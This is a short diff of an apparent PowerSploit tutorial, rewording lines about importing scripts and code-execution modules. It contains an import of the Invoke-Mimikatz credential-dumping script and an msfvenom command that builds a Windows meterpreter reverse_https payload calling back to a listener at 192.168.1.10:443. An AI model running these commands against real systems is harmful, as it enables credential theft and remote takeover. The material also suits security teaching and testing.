 Import-Module .\Exfiltration\Invoke-Mimikatz.ps1

-3. You can also download and import individual scripts from the PowerSploit GitHub repository if you don’t want to clone the entire repository.
+💡 You can also download and import individual scripts from the GitHub repo if you prefer not to clone the full project.

 PowerSploit Modules

-The code execution modules in PowerSploit enable you to run arbitrary code on a target system.
-Some popular modules in this category are:
+These modules allow you to execute arbitrary code on a target system.

 msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.1.10 LPORT=443 -f powershell